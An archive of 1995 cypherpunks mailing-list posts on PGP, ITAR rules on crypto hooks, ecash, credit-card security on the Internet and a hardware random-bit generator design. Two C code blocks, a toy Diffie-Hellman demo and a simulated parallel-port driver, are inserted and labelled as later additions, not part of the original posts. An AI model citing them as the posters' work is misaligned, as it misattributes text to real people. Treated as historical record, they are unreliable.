From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 15 Nov 1995 06:09:44 +0800
To: "W. Kinney" <kinney@bogart.Colorado.EDU>
Subject: Re: ANNOUNCE: Curve Encrypt 2.2
In-Reply-To: <199511140336.UAA17922@bogart.Colorado.EDU>
Message-ID: <Pine.ULT.3.91.951113204535.2116G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Sounds cool, but...

I already have PGP on my Macs. Why would I want this?

I suppose one use might be in a public lab, where a secret key and
identity would be inappropriate. Or maybe to encrypt your PGP keychains if
you leave them on a physically insecure hard drive (though you could use
PGP conventional encryption for that). 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 15 Nov 1995 06:02:44 +0800
To: cypherpunks@toad.com
Subject: data compression
Message-ID: <Pine.OSF.3.91.951114000133.18347B-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does any one have any information about or pointers to the data compression 
algorithms used by Colorado Systems and/or any other QIC backup vendors?

Thanks,

Dan



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vitamin <vitamin@best.com>
Date: Wed, 15 Nov 1995 01:16:41 +0800
To: cypherpunks@toad.com
Subject: Re: unsubcribe
Message-ID: <199511141535.HAA01352@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



unsubcribe









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 15 Nov 1995 01:15:46 +0800
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: U.S. Exit Tax - SI
In-Reply-To: <199511141046.EAA18231@mail.socketis.net>
Message-ID: <199511141326.IAA05233@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This is really not cypherpunks material at all. Post this sort of
thing to "Libernet", not to cypherpunks.

.pm

Gary Jeffers writes:
>                   U.S.  EXIT TAXES
> from Strategic Investment's Intelligence bulletins - November 15, 1995
> 
>    Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
> forecasted the coming of the "exit" tax proposed by the Clinton Admin-
> istration earlier this year. Now Senate Republicans have passed an exit
> tax that is even more punitive than that proposed by Clinton. Section




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charles@europages.com
Date: Wed, 15 Nov 1995 11:11:45 +0800
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <9511140946.AA02846@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 01:12:41 +0800
To: cypherpunks@toad.com
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I just found this tidbit while following Sameer's Apache WWW server link.
For those who were wondering if plug-in crypto hooks were still watched 
out for. One wonders how the ietf folks are managing to promote internet-wide
standards that are considered unexportable (Are they? What's the deal on 
photuris, PEM, ipsec and the rest of them?)

Ps. I may be totally wrong, but I remember seeing something posted last 
month about some ZKIPS scheme in relation with Netscape (zero knowledge 
proofs with web servers, huh? Confused).


-----------------------------------------------------------------------
   
                         WHY WE TOOK PEM OUT OF APACHE
                                       
   On May 17th, 1995, we were asked by a representative of NCSA to remove
   any copies of NCSA httpd prior to 1.4.1 from our web site. They were
   mandated by the NSA to inform us that redistribution of pre-1.4.1 code
   violated the same laws that make distributing Phil Zimmermann's PGP
   package to other countries illegal. There was no encryption in NCSA's
   httpd, only hooks to publicly available libraries of PEM code. By the
   NSA's rules, even hooks to this type of application are illegal. 
   
   Because Apache is based on NCSA code, and we had basically not touched
   that part of the software, we were informed that Apache was also
   illegal to distribute to foreign countries, and advised (not mandated)
   by NCSA to remove it. So, we removed both the copies of the NCSA httpd
   we had, and all versions of Apache previous to 0.6.5. 
   
   The Apache members are strong advocates of the right to digital
   privacy, so the decision to submit to the NSA and remove the code was
   not an easy one. Here are some elements in our rationale: 
     * The PEM code in httpd was not widely used. No major site relied
       upon its use, so its loss is not a blow to encryption and security
       on the world wide web. There are other efforts designed to give
       much more flexible security - SSL and SHTTP - so this wasn't a
       function whose absence would really be missed on a functional
       level. 
     * We didn't feel like being just a couple more martyrs in a fight
       being fought very well by many other people. Rather than have the
       machine that supports the project confiscated or relocated to
       South Africa, etc., we think there are more efficient methods to
       address the issue. 
       
   It kind of sickens us that we had to do it, but so be it. 
   
   Patches that re-implement the PEM code may be available at a foreign
   site soon. If it does show up, we'll point to it - that can't be
   illegal! 
   
   Finally, here is a compendium of pointers to sites related to
   encryption and export law. We can't promise this list will be up to
   date, so send us mail when you see a problem or want a link added.
   Thanks. 
     * Yahoo - Science: Mathematics: Security and Encryption 
     * EFF Crypto/Privacy/Security Archive 
     * Crypto page at Quadralay 
     * Cryptography Export Control Archives (Cygnus) 
     * ICLU - Your Rights in Cyberspace 
       
   Brian, brian@hyperreal.com 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lbowen@eznet.net (Lloyd Bowen)
Date: Wed, 15 Nov 1995 01:17:39 +0800
To: cypherpunks@toad.com
Subject: BBS Generator Code Needed
Message-ID: <199511141529.KAA04080@shell1.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
would rather not have to write it myself if there is tested code available.
--8^}

Thanks
======================================================================
Lloyd Bowen
Paychex, Inc.
E-Mail to: lbowen@eznet.net
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Wed, 15 Nov 1995 01:15:26 +0800
To: cypherpunks@toad.com
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951114105404.13469A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 14 Nov 1995, Eric Young wrote:
> Even if the private DH values are pre-calculated, this will only halve the
> time of the DH operation and if this is done it loses the advantage of DH
> in that if the private/public pair are 'generated on the fly',
> pre-recorded session will not be able to be decoded if the private key is

Urk, that reads very badly. What I meant is that since a different
public/private key is used per session, if a private key is revealed, any
previous and future communication between the 2 entities is not
compromised, only the particular session using that public/private key pair.
Also since the key pair is generated on the fly, they don't need to be 
recorded on disk etc, so the only way to get the private key is to 
'hack' the application at runtime (or modify it in advance).

eric (who is having a bad day converting his thoughts to English...).
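
The per-session key pair argument in the message above, as an added example that is not part of the original post: a toy Diffie-Hellman exchange that counts how many recorded sessions one leaked private exponent exposes when the key pair is reused versus generated per session. The modulus 2^31 - 1, generator 7, function names and private exponents are constructed assumptions for illustration and are far too small for real use.

```c
#include <stdint.h>
#include <stdio.h>

#define DH_P 2147483647ULL  /* 2^31 - 1: toy modulus (assumption) */
#define DH_G 7ULL           /* toy generator (assumption) */

/* Square-and-multiply; operands stay below 2^31, so products fit in 64 bits. */
static uint64_t powmod(uint64_t base, uint64_t exp)
{
    uint64_t r = 1;
    base %= DH_P;
    while (exp) {
        if (exp & 1)
            r = (r * base) % DH_P;
        base = (base * base) % DH_P;
        exp >>= 1;
    }
    return r;
}

/* What a passive recorder sees (the public values) plus the key it wants. */
struct session {
    uint64_t a_pub, b_pub;
    uint64_t key;
};

static struct session run_session(uint64_t a_priv, uint64_t b_priv)
{
    struct session s;
    s.a_pub = powmod(DH_G, a_priv);
    s.b_pub = powmod(DH_G, b_priv);
    s.key = powmod(s.b_pub, a_priv);  /* A's computation; B uses a_pub^b_priv */
    return s;
}

static int both_sides_agree(uint64_t a_priv, uint64_t b_priv)
{
    return powmod(powmod(DH_G, b_priv), a_priv) ==
           powmod(powmod(DH_G, a_priv), b_priv);
}

/* Count recorded sessions whose key follows from one leaked exponent of A. */
static int sessions_exposed(const struct session *s, int n, uint64_t leaked)
{
    int exposed = 0;
    for (int i = 0; i < n; i++)
        if (powmod(s[i].b_pub, leaked) == s[i].key)
            exposed++;
    return exposed;
}

/* Constructed private exponents; a real implementation draws them at random. */
static const uint64_t A_PRIV[3] = {123456789ULL, 123522326ULL, 123464708ULL};
static const uint64_t B_PRIV[3] = {1000003ULL, 1000000007ULL, 998244353ULL};

/* ephemeral = 1: A uses a fresh exponent per session; 0: A reuses A_PRIV[0].
 * In both cases the exponent from the first session is the one that leaks. */
static int exposed_after_leak(int ephemeral)
{
    struct session s[3];
    for (int i = 0; i < 3; i++)
        s[i] = run_session(ephemeral ? A_PRIV[i] : A_PRIV[0], B_PRIV[i]);
    return sessions_exposed(s, 3, A_PRIV[0]);
}

int main(void)
{
    printf("reused key pair:      %d of 3 sessions exposed\n", exposed_after_leak(0));
    printf("per-session key pair: %d of 3 sessions exposed\n", exposed_after_leak(1));
    return 0;
}
```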




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 15 Nov 1995 03:56:52 +0800
To: cypherpunks@toad.com
Subject: c2.org now accepts ecash
Message-ID: <199511141926.LAA05987@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	We now accept ecash: http://www.c2.org/signup.phtml

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 01:37:44 +0800
To: cypherpunks@toad.com
Subject: FKI_osk
Message-ID: <199511141703.MAA01329@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-14-95. Washrag:


   "FBI Targets Expected Growth In Computer Crime."

      The FBI is beefing up its fight against computer crime.
      A Washington office, which handles international cases,
      was established in 1993. The San Francisco office will
      keep a close eye on activities in Silicon Valley, while
      the New York squad will handle financial-related
      computer crimes.


   "Postal Service Planning to Sell Prepaid Telephone Cards."

      Because the phone cards are "stored value cards," they
      could offer the Postal Service a logical first step
      toward the use of a "smart card" that might be used in
      connection with an information kiosk the agency is
      developing for the federal government to provide the
      public with a computer link to the federal bureaucracy.
      Long-range plans for the kiosk call for use of smart
      cards that would enable people to receive government
      payments, such as welfare benefits or checks for food
      stamps.


   FKI_osk  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 15 Nov 1995 04:26:30 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <9511141920.AA13573@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951114115921.17855A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Rich Salz wrote:

> As I said in my original message about Pegasus:
> 	The NSA consider this kind of thing "crypto with a hole"
> 	It's stupid, the hole is the crypto.  But, the rest of
> 	the code is considered by the Agency to be an "ancillary
> 	device" as defined under ITAR.

The interesting question is how narrow the interface has to be before it 
becomes in violation of the ITAR. Is the key question whether the "holes" 
are specifically designed for the insertion of cryptographic materials, 
or is it the fact that they could be used to support cryptographic 
enhancements?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmacfarlane@zip.sbi.com (David Macfarlane)
Date: Wed, 15 Nov 1995 02:28:24 +0800
To: cypherpunks@toad.com
Subject: Re: BBS Generator Code Needed
Message-ID: <9511141749.AA28423@zip_master2.sbi.com>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
>
> Thanks
> ======================================================================
> Lloyd Bowen
> Paychex, Inc.
> E-Mail to: lbowen@eznet.net
> ======================================================================

Wei Dai's crypto++ has BBS, if you can find a copy.

	David.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 05:24:49 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142050.MAA20488@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Nov 1995, Nelson Minar wrote:

> Today's New York Times has a nice article in the business section
> about credit card security on the Internet. It's more of an editorial
> than an article, but it's an editorial with the (IMNSHO) right spin:
> shipping a credit card number over the Internet, even unencrypted, is
> no less secure than giving it out over the phone.

I haven't picked up the paper and looked at the article.  Once in a blue
moon, I might pick up the International Herald Tribune, but only on the
rarest of rare circumstances, but this worries me.  

And it really should worry everyone who might have some interest in harm
reduction. 

If someone in the Business Section of the New York Times is writing as you
say -- writing that shipping a credit card number UNENCRYPTED over the
Internet is no less secure than giving it out over the phone, then we have
a SERIOUS communications/understanding gap to overcome. 

It seems like not only the NY Times, but the "You Will" folk at AT&T don't
quite "get" it.  (The AT&T swipe, is for the idjit that sent me email on
postcard via bucket brigade, and then asked me to please keep it
"private".)

A simple understanding is necessary if we're going to use this 
snazzy new technology, and not kill the goose that lays the golden 
egg.  An understanding that the NY Times, or its *experts* don't seem to 
have.

A telephone connection goes from one point to another.  It's like a 
football pass.  An internet connection is different, it's like an old 
fashioned bucket brigade.

Now, if you were to write a message on a football, and throw it, while
there is a "risk" of interception you can be reasonably certain that the
message on the ball will be "reasonably" safe while flying through the 
air.  This is the phone call "football" analogy.

The net however does not establish a direct connection like a telephone
call.  It works like the old "bucket brigade" of volunteer fire
departments.  Your message is handed off -- handed to the next person in a
chain, who then hands it to the next, and so on. 

Your "message" (or credit card number) is effectively written on a
postcard and passed around from person to person, before it gets to your
final destination.  This makes it completely different than the telephone
call.  Orders of magnitude different.

So here's the question ... and here's the comparison.  Would you, if you
were in New York, buy something with your credit card using the following
payment method. 

Would you, write your credit card number on the back of a postcard, and
leave it with your neighbour, with instructions to give to the doorman,
who's supposed to flag a cabbie and tell him to take it to a building, to
then give it to another doorman, who will leave it with the business next
door to give to the person or business that you want to have your credit
card number?? 

Why not??  Does this strike any reader as something really silly??  

Because, this is actually the way the Internet works.  This is exactly how
any message, whether it's your email, or your credit card number gets from
Point A to Point B.  A message that is going from one computer, even to
one just down the block, might end up going through twenty or thirty
"hands" before being delivered. 

This is what makes the Internet rather unsafe, far more unsafe than a
telephone call.  And this lack of understanding, the lack of understanding
in the press is what makes the Internet even unsafer.  It is people being 
very cavalier.

Many people trust the NY Times to "get it right", then again, the  investor
also trusts that these companies actually know what they're doing. 

The public deserves better.

> The NYT has been doing a nice job covering computer issues in the past
> few months, in the Monday's business section. Worth reading if you
> want to keep an eye on intelligent media coverage of the net.

If this is the "intelligent media coverage", then how on earth are they
going to be able to cover "taking down" the Internet for some repairs?? 

And how are they gonna cover the inevitable, Internet crime of the
century? 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 15 Nov 1995 02:34:08 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511141758.MAA14695@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:

> For those who were wondering if plug-in crypto hooks were still watched 
> out for. One wonders how the ietf folks are managing to promote internet-wide
> standards that are considered unexportable (Are they? What's the deal on 
> photuris, PEM, ipsec and the rest of them?)

>                          WHY WE TOOK PEM OUT OF APACHE
>                                        
>    On May 17th, 1995, we were asked by a representative of NCSA to remove
>    any copies of NCSA httpd prior to 1.4.1 from our web site. They were
>    mandated by the NSA to inform us that redistribution of pre-1.4.1 code
>    violated the same laws that make distributing Phil Zimmermann's PGP
>    package to other countries illegal. There was no encryption in NCSA's
>    httpd, only hooks to publicly available libraries of PEM code. By the
>    NSA's rules, even hooks to this type of application are illegal. 

Does anyone know the ostensible justification for this?  What section of
the ITARs do they point to when they say "this is illegal"?  I've perused
an online copy of ITAR (no, I haven't read all of it -- I have other
things I want to do this year :-), but I can't find a section that could
be construed to support this contention.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 15 Nov 1995 06:34:49 +0800
To: cypherpunks@toad.com
Subject: setting up an ecash shop
Message-ID: <199511142206.OAA22935@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	If you'd like to set up an ecash shop as a merchant, you can
do it this week and have the $300 setup fee waived. (This
is for the $5/month 2% movement fee account-- the most expensive one
they have.) I set up my eshop@c2.org thing using the promotion.
	Information is at http://www.marktwain.com/promo.html

	(The $300 setup fee I think is outrageous, but at least this
week you don't have to worry about it.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 15 Nov 1995 06:40:58 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Credit Card security in the New York Times
Message-ID: <199511142212.OAA14291@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 11/14/95 -0800, anonymous-remailer@shell.portal.com wrote:
>On Mon, 13 Nov 1995, Nelson Minar wrote:
>
>> Today's New York Times has a nice article in the business section
>> about credit card security on the Internet. It's more of an editorial
>> than an article, but it's an editorial with the (IMNSHO) right spin:
>> shipping a credit card number over the Internet, even unencrypted, is
>> no less secure than giving it out over the phone.
>
>I haven't picked up the paper and looked at the article...
>
>If someone in the Business Section of the New York Times is writing as you
>say -- writing that shipping a credit card number UNENCRYPTED over the
>Internet is no less secure than giving it out over the phone, then we have
>a SERIOUS communications/understanding gap to overcome. 

I did read the article.  It said, "The truth is that sending a credit card
number to an electronic merchant over the Internet is probably the safest
way to make such a transaction.

"In the last week, for example, I handed my credit card to a waiter who
disappeared with it for five minutes.  I faxed my credit card information
to a business in New Jersey, and the fax probably lay exposed to everyone in
that office for hours and perhaps to the cleaning crew that night. ...

"Yes, there is a risk that someone was tapping my telephone when I read my
credit card number aloud or faxed it.  [reminder about cell phones deleted]
 A spy might have snapped a picture of my credit card with a hidden camera
when I handed it to the waiter.  A hacker might have intercepted my numbers
as they passed through an Internet router in Hackensack, N.J.

" But compared with the risk of handing my credit card to a stranger, which
I do nearly every day, sending it over the Internet is pretty secure.

"The real risk of sending my unencrypted number is not that some
cyberspace cowboy will intercept it en route to the electronic merchant,
but rather that the receiving company will store my credit information in
an insecure computer. ...

"My credit card number was probably among the 30,000 or so that were lifted
last year from unsecured computers of Netcom ...

"Willie Sutton did not mug individuals for their wallets; he robbed banks,
because, as he noted, that's where the money was...

"... The people who should be really nervous about electronic commerce are
the banks, brokerage houses and those who do business-to-business
transactions."


In context, a much more reasonable view than the anonymous poster suggests.
 I add, that with an insurance policy (that you are forced to pay for)
which broadly limits your risk to $50, you don't have to be all that
careful.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 15 Nov 1995 04:33:38 +0800
To: cypherpunks@toad.com
Subject: Good Enough?
Message-ID: <30a8f8836ed1002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


We're looking at providing good tools for digital signatures on
e-mail here, for users that are interested. We plan to make available
PGP public keys in the student/staff X.500 directory, with suitable
tools for retrieving keys, etc. A couple questions have come up that
make me wonder what would be an acceptable service, at least given
the environment that we have to work with.

The first question has to do with key generation. One of the managers
was of the opinion that we could do the key generation for the user,
and either email or otherwise make the private key available to the 
user. The idea is to make it easy for the user to create their keys
by providing a web interface, etc. BTW, we're running Netscape's 
Commerce server so we could expect at least 40 bits of protection
(big deal, I know) on the passphrase transmission. The good enough
part is due to the idea that we're running a couple of large multi-
user machines, with all the risks those entail. Note also that 
we would not be keeping logs or otherwise compromising the keys
ourselves, this would strictly be a user-friendly way to get people
using signatures. We would also accept keys that users create themselves,
this would only be one option.

Second, the web of trust might also be useful, so we could sign
users' keys to certify them. Has anyone worked in an organization
of some sort that has a structured approach to key certification
using PGP?

This is just in the preliminary talking stages at this point,
but I thought I'd toss these 2 ideas out for comments to see
what people here think.

 
-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111|- Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 15 Nov 1995 03:52:00 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511141920.AA13573@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


As I said in my original message about Pegasus:
	The NSA consider this kind of thing "crypto with a hole"
	It's stupid, the hole is the crypto.  But, the rest of
	the code is considered by the Agency to be an "ancillary
	device" as defined under ITAR.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 15 Nov 1995 03:48:33 +0800
To: Lloyd Bowen <lbowen@eznet.net>
Subject: Re: BBS Generator Code Needed
In-Reply-To: <199511141529.KAA04080@shell1.eznet.net>
Message-ID: <Pine.3.89.9511141448.A37638-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 14 Nov 1995, Lloyd Bowen wrote:

> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
They have one at the big mother lode at 
<ftp://ftp.dsi.unimi.it/pub/security/crypt/code> 
Wei Dai's crypto++ also has one in C++.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 15 Nov 1995 06:53:07 +0800
To: cypherpunks@toad.com
Subject: Hardware-random-bits interface
Message-ID: <199511142231.OAA25441@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been thinking about physically random bits recently, so
I'd like to offer a simple, easily implementable interface to a
source of such bits, along with a design sketch using a common
radio receiver chip as the noise source.  The interface consists
of two bits in the standard PC parallel port, one serving as
the data line and the other the sampling clock.

The parallel port, while a bit less universal than RS-232, eliminates
the complexity of UARTs and clock generation and offers higher speed
and friendlier local power.  For an ISA bus running at 8 MHz, bits can
be sampled at about 2.5 Mb/s, i.e., about 300 kB/s.  (The bandwidth of
the noise source should of course be consistent with this.)  Another
advantage of a simple device is that it can be thoroughly inspected:
there is no PLD or microcontroller code to vet/trust.

Not all parallel ports have bidirectional data registers, so the
most general path is to assign a status bit to the input and
use a control bit for the clock output.  I'm using bit 4 of
the status register (pin 13 on the PC's DB-25) as the input
and bit 0 of the control register (pin 1) as the clock.
Specifically, the rising edge of pin 1 should sample the noise
waveform and present the result on pin 13.  (Pin 1 is inverted,
so bit 0 should transition from 1 to 0.)

I'd also like to suggest a device name for the Unix environment,
/dev/prandom, for "physically random".  The intention is that the
bits returned be as raw as possible, as close to the physics as
possible, leaving any debiasing/hashing to other software (for
example, the /dev/random implementation in recent Linux kernels).
(I have a Linux device driver that implements this interface;
it is very simple, needing only to sample the bits, pack them
into bytes, and manage mutual exclusion, filesystem housekeeping,
and probing.)

Here are the particulars of the "dongle" board I'm in the
process of making.

  Noise source:  an FM/IF radio receiver chip, with no input
    supplied, so that the IF amplifier chain produces wideband
    noise at its output.  I'm looking at the Motorola MC13158
    and the Philips SA626.  Each provides about 20 MHz of
    IF bandwidth, and the Motorola part has an on-chip
    comparator, reducing the entire device to two chips:
    the receiver chip and an HCMOS flip-flop.

  Power:  from the port data lines; >=3.5V at about 20 mA is
    available.

  Device probing:  the device should somehow identify itself
    as a random bit generator.  One way to do this is to wire
    one of the parallel port data bits to a status line; for
    example, data bit 0 (pin 2) could be wired to status bit 5
    (pin 12).  Software can then twiddle the data bit and
    watch for the response.

  Cost:  around $10 in parts, I guess.

A rate of 300 kB/s will make a 600 MB one-time pad in an hour
(assuming software is similarly fast).  I'm wondering if any
of the mail systems have convenient hooks to use pads (though
it would not be difficult to write up).

Suggestions welcome.  I'll put the design on the Web
once it's finished; replicating it should be pretty easy.
People can also grab the device driver if they wish.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar
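
The sampling, byte-packing and probing logic described in the message above, as an added example that is not the author's driver: it uses the bit assignments from the post (status bit 4 for data, control bit 0 for the clock, data bit 0 looped back to status bit 5 for probing) and runs against a simulated board instead of real port I/O. The port abstraction, all function names, the most-significant-bit-first packing order and the sample "noise" bits are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bit assignments from the post (standard PC parallel port registers). */
#define STATUS_DATA   0x10u  /* status bit 4, DB-25 pin 13: sampled noise bit */
#define STATUS_PROBE  0x20u  /* status bit 5, DB-25 pin 12: probe loopback    */
#define CONTROL_CLOCK 0x01u  /* control bit 0, DB-25 pin 1 (inverted): clock  */
#define DATA_PROBE    0x01u  /* data bit 0, DB-25 pin 2: drives the loopback  */

/* Hypothetical port abstraction so the logic runs without hardware. */
struct pport {
    uint8_t (*read_status)(void *ctx);
    void (*write_control)(void *ctx, uint8_t v);
    void (*write_data)(void *ctx, uint8_t v);
    void *ctx;
};

/* Probe: toggle data bit 0 and require status bit 5 to follow each time. */
static int prandom_probe(const struct pport *p)
{
    for (int i = 0; i < 4; i++) {
        int want = i & 1;
        p->write_data(p->ctx, want ? DATA_PROBE : 0);
        if (((p->read_status(p->ctx) & STATUS_PROBE) != 0) != want)
            return 0;
    }
    return 1;
}

/* One sample: control bit 0 goes 1 -> 0, which is a rising edge on pin 1. */
static unsigned prandom_read_bit(const struct pport *p)
{
    p->write_control(p->ctx, CONTROL_CLOCK);
    p->write_control(p->ctx, 0);
    return (p->read_status(p->ctx) & STATUS_DATA) ? 1u : 0u;
}

/* Pack raw bits into bytes, first sample in the top bit (assumed order).
 * No debiasing or hashing: the bits are returned exactly as sampled. */
static size_t prandom_read(const struct pport *p, uint8_t *buf, size_t n)
{
    if (!prandom_probe(p))
        return 0;  /* refuse to return data from an unidentified device */
    for (size_t i = 0; i < n; i++) {
        uint8_t b = 0;
        for (int k = 0; k < 8; k++)
            b = (uint8_t)((b << 1) | prandom_read_bit(p));
        buf[i] = b;
    }
    return n;
}

/* Simulated dongle: a constructed stand-in for the real board. */
struct sim {
    const uint8_t *bits;  /* constructed "noise", one bit per element */
    size_t len, pos;
    uint8_t control, data, latched;
    int present;          /* 0 = nothing attached to the port */
};

static uint8_t sim_status(void *ctx)
{
    struct sim *d = ctx;
    uint8_t s = 0;
    if (!d->present) return 0;
    if (d->latched) s |= STATUS_DATA;
    if (d->data & DATA_PROBE) s |= STATUS_PROBE;
    return s;
}

static void sim_control(void *ctx, uint8_t v)
{
    struct sim *d = ctx;
    /* The flip-flop latches a new sample only on the 1 -> 0 transition. */
    if ((d->control & CONTROL_CLOCK) && !(v & CONTROL_CLOCK) && d->pos < d->len)
        d->latched = d->bits[d->pos++] & 1u;
    d->control = v;
}

static void sim_data(void *ctx, uint8_t v) { ((struct sim *)ctx)->data = v; }

/* Run the driver logic against the simulated board. */
static size_t prandom_demo(int present, uint8_t *out, size_t n)
{
    static const uint8_t noise[16] = {1,0,1,0,0,1,0,1, 1,1,0,0,0,0,1,1};
    struct sim d = { noise, sizeof noise, 0, 0, 0, 0, present };
    struct pport p = { sim_status, sim_control, sim_data, &d };
    return prandom_read(&p, out, n);
}

int main(void)
{
    uint8_t out[2] = {0, 0};
    size_t got = prandom_demo(1, out, 2);
    printf("%zu bytes: %02x %02x\n", got, out[0], out[1]);
    return 0;
}
```

On real hardware the three callbacks would wrap port I/O at the port's base address, and the control write should preserve the other control-register bits.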





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 15 Nov 1995 04:55:41 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142038.PAA07035@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber writes:
>Does anyone know the ostensible justification for this?  What section of
>the ITARs do they point to when they say "this is illegal"?  I've perused
>an online copy of ITAR (no, I haven't read all of it -- I have other
>things I want to do this year :-), but I can't find a section that could
>be construed to support this contention.

I think it's 121.1, Category XIII paragraph (b) item (5):
"Ancillary equipment specifically designed or modified for paragraphs (b)
(1), (2), (3), (4) and (5) of this category;"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Wed, 15 Nov 1995 04:17:24 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
